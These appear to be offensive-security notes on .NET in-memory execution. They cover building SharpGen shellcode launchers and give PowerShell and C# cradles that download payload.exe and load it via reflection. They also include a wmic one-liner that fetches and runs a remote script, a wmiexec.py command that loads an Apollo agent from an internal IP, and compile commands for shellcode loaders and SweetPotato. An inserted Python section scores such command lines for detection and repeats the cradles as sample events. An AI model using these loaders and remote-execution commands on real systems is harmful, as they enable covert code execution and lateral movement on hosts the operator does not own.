Notes on .NET in-memory execution and shellcode loading

This is a SharpGen-compatible C# shellcode launcher snippet:

var shellcode = Convert.FromBase64String("shellcode_here");
ShellCode.ShellCodeExecute(shellcode);

Build SharpGen, which is used to create the .NET shellcode launcher. You may need to update the .NET Core framework version in the project to a more recent one:

git clone https://github.com/cobbr/SharpGen
cd SharpGen
dotnet build

Once it is built, run SharpGen like so to compile the shellcode launcher code into a .NET assembly:

dotnet bin/Debug/netcoreapp2.1/SharpGen.dll -f payload.exe -s source.txt -c Shell -d net40 

The following PowerShell script uses reflection to load the shellcode executable generated with SharpGen:

$bytes = (new-object net.webclient).downloaddata("http://server:port/payload.exe")
[System.Reflection.Assembly]::Load($bytes)
$BindingFlags = [Reflection.BindingFlags] "NonPublic,Static"
$main = [Shell].getmethod("Main", $BindingFlags)
$main.Invoke($null, $null)

This is how you can do the same thing in C# (taken from here):

// Added for modern https support
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls11 | SecurityProtocolType.Tls12;
WebClient w = new System.Net.WebClient();
byte[] rd = w.DownloadData("http://server:port/payload.exe");
Assembly aas = Assembly.Load(rd);
MethodInfo m = aas.EntryPoint;    
m.Invoke(null, null);

If the assembly's entry point takes parameters, invoke it like so, where p is a string[] of parameters (it can be empty):

object[] parameters = new[] { p };
m.Invoke(null, parameters);

You can use wmic to launch a PowerShell script from a web source:

wmic process call create "powershell iex(new-object net.webclient).downloadstring('http://host:port/script.ps1')"

The following is an example of a reflection-based load of Apollo:

wmiexec.py DOMAIN/[email protected] "powershell [System.Reflection.Assembly]::Load((new-object net.webclient).downloaddata('http://192.168.1.214/Apollo_new.exe')).EntryPoint.Invoke(\$null, @(\$null))"
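
From the detection side, the one-liners and scripts above leave recognisable text in process-creation command lines and in PowerShell script block logs (Event ID 4104). The following is an added example, not part of the original notes: a small Python triage function that scores such text. The rule names, the severity scheme and the sample events (with the placeholder host.example) are assumptions constructed for illustration.

```python
import re

# Heuristic rules for the command-line shapes shown in these notes (assumed rule names).
RULES = {
    "reflective_assembly_load": re.compile(
        r"\[(system\.)?reflection\.assembly\]::load\s*\(", re.I),
    "webclient_download": re.compile(
        r"net\.webclient\)?\s*\.\s*download(data|string)\s*\(", re.I),
    "iex_download_cradle": re.compile(
        r"\b(iex|invoke-expression)\b.*downloadstring", re.I),
    "wmic_spawns_powershell": re.compile(
        r"\bwmic\b.*\bprocess\s+call\s+create\b.*powershell", re.I),
    "entrypoint_invoke": re.compile(r"\.entrypoint\.invoke\s*\(", re.I),
}

def classify(text: str) -> dict:
    """Score one command line or one multi-line script block."""
    # Collapse newlines/whitespace so a download on one line and a Load() on
    # the next are evaluated together.
    flat = re.sub(r"\s+", " ", text).strip()
    hits = sorted(name for name, rx in RULES.items() if rx.search(flat))
    if {"webclient_download", "reflective_assembly_load"} <= set(hits):
        severity = "high"    # fetched bytes loaded as an assembly, nothing written to disk
    elif hits:
        severity = "medium"  # download cradle or loader primitive on its own
    else:
        severity = "none"
    return {"severity": severity, "rules": hits}

# Constructed sample events (host.example is a placeholder), not real telemetry.
SAMPLES = {
    "one_liner": "powershell [System.Reflection.Assembly]::Load((new-object "
                 "net.webclient).downloaddata('http://host.example/payload.exe'))"
                 ".EntryPoint.Invoke($null, @($null))",
    "wmic_cradle": "wmic process call create \"powershell iex(new-object "
                   "net.webclient).downloadstring('http://host.example/script.ps1')\"",
    "script_block": "$bytes = (new-object net.webclient).downloaddata("
                    "\"http://host.example/payload.exe\")\n"
                    "[System.Reflection.Assembly]::Load($bytes)",
    "benign": r"powershell -NoProfile -Command Get-ChildItem C:\Temp",
}

if __name__ == "__main__":
    for name, event in SAMPLES.items():
        print(name, classify(event))
```

The "high" verdict requires both a network fetch and Assembly.Load in the same event, which keeps legitimate uses of either primitive on its own at "medium" for analyst review.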

Another x64 shellcode launcher here

It can be compiled like so, specifying x64 as the platform:

csc /platform:x64 /out:sc.exe x64_shellcode_loader.cs

Other assorted .NET command-line commands with switches:

nuget restore SweetPotato.sln
msbuild /p:Configuration=Release
csc /langversion:4.0 /platform:x64 /out:ps1 ps_test.cs